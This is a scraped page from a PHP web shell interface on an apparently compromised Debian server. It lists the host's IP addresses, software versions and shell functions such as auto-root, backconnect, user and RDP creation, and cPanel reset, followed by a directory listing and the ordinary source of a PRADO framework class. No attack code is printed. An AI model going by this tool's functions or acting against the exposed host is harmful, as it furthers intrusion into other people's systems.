Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.22.242.169
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Web /
UI /
[ HOME SHELL ]
Name
Size
Permission
Action
ActiveControls
[ DIR ]
drwxr-xr-x
JuiControls
[ DIR ]
drwxr-xr-x
WebControls
[ DIR ]
drwxr-xr-x
IBindable.php
527
B
-rw-r--r--
IBroadcastEventReceiver.php
941
B
-rw-r--r--
IButtonControl.php
2.5
KB
-rw-r--r--
INamingContainer.php
467
B
-rw-r--r--
IPageStatePersister.php
888
B
-rw-r--r--
IPostBackDataHandler.php
1.28
KB
-rw-r--r--
IPostBackEventHandler.php
830
B
-rw-r--r--
IRenderable.php
618
B
-rw-r--r--
ISurroundable.php
887
B
-rw-r--r--
ITemplate.php
761
B
-rw-r--r--
ITheme.php
621
B
-rw-r--r--
IValidatable.php
830
B
-rw-r--r--
IValidator.php
1.13
KB
-rw-r--r--
TBroadcastEventParameter.php
1.49
KB
-rw-r--r--
TCachePageStatePersister.php
6.17
KB
-rw-r--r--
TClientScriptManager.php
27.57
KB
-rw-r--r--
TClientSideOptions.php
2.24
KB
-rw-r--r--
TCommandEventParameter.php
1.26
KB
-rw-r--r--
TCompositeControl.php
950
B
-rw-r--r--
TCompositeLiteral.php
2.87
KB
-rw-r--r--
TControl.php
55.29
KB
-rw-r--r--
TControlAdapter.php
3.67
KB
-rw-r--r--
TControlCollection.php
2.47
KB
-rw-r--r--
TEmptyControlCollection.php
1.24
KB
-rw-r--r--
TEventContent.php
1.38
KB
-rw-r--r--
TForm.php
4.45
KB
-rw-r--r--
THtmlWriter.php
5.32
KB
-rw-r--r--
TPage.php
35.57
KB
-rw-r--r--
TPageStateFormatter.php
2.69
KB
-rw-r--r--
TPageStatePersister.php
1.66
KB
-rw-r--r--
TSessionPageStatePersister.php
3.93
KB
-rw-r--r--
TSkinTemplate.php
1.38
KB
-rw-r--r--
TTemplate.php
35.29
KB
-rw-r--r--
TTemplateControl.php
9.48
KB
-rw-r--r--
TTemplateControlInheritable.ph...
3.38
KB
-rw-r--r--
TTemplateManager.php
4.2
KB
-rw-r--r--
TTheme.php
10.8
KB
-rw-r--r--
TThemeManager.php
5.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TTemplateControlInheritable.php
<?php /** * TTemplateControlInheritable class file. * * @author Schlaue-Kids.net <info@schlaue-kids.net> * @link http://www.schlaue-kids.net/ * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Web\UI; use Prado\Exceptions\TConfigurationException; /** * TTemplateControlInheritable class. * TTemplateControlInheritable is an extension to the base class for all controls that use templates. * By default, a control template is assumed to be in a file under the same * directory with the control class file. They have the same file name and * different extension name. For template file, the extension name is ".tpl". * If a TTemplateControlInheritable is inherited it uses the base class template unless the * inheriting control defines an own. * * @author Schlaue-Kids.net <info@schlaue-kids.net> * @author Kyle Caine * @since 3.1.8 */ class TTemplateControlInheritable extends TTemplateControl { // methods /** * Creates child controls. * This method is overridden to load and instantiate control template. * This method should only be used by framework and control developers. * Uses the controls template if available or the base class template otherwise. * * @throws TConfigurationException if a template control directive is invalid */ public function createChildControls() { if (null === ($_template = $this->getTemplate())) { $this->doCreateChildControlsFor(get_class($this)); return; } foreach ($_template->getDirective() as $_name => $_value) { if (!is_string($_value)) { throw new TConfigurationException('templatecontrol_directive_invalid', get_class($this), $_name); } $this->setSubProperty($_name, $_value); } $_template->instantiateIn($this); } /** * This method creates the cild controls for the given class * * @param string $parentClass $parentClass The class to generate the child controls for */ public function doCreateChildControlsFor($parentClass) { if (false !== ($_parentClass = get_parent_class($parentClass)) && 'TTemplateControl' != $_parentClass) { $this->doCreateChildControlsFor($_parentClass); } $this->doTemplateForClass($parentClass); } /** * This method creates the template object for the given class * * @param string $parentClass The class to create the template from * @throws TConfigurationException if a template control directive is invalid */ public function doTemplateForClass($parentClass) { if (null !== ($_template = $this->getService()->getTemplateManager()->getTemplateByClassName($parentClass))) { foreach ($_template->getDirective() as $_name => $_value) { if (!is_string($_value)) { throw new TConfigurationException('templatecontrol_directive_invalid', get_class($this), $_name); } $this->setSubProperty($_name, $_value); } $_template->instantiateIn($this); } } // getter/setter /** * A source template control loads its template from external storage, * such as file, db, rather than from within another template. * * @return bool whether the current control is a source template control */ public function getIsSourceTemplateControl() { if (null !== ($_template = $this->getTemplate())) { return $_template->getIsSourceTemplate(); } return ($_template = $this->getService()->getTemplateManager()->getTemplateByClassName(get_parent_class($this))) ? $_template->getIsSourceTemplate() : false; } }
Close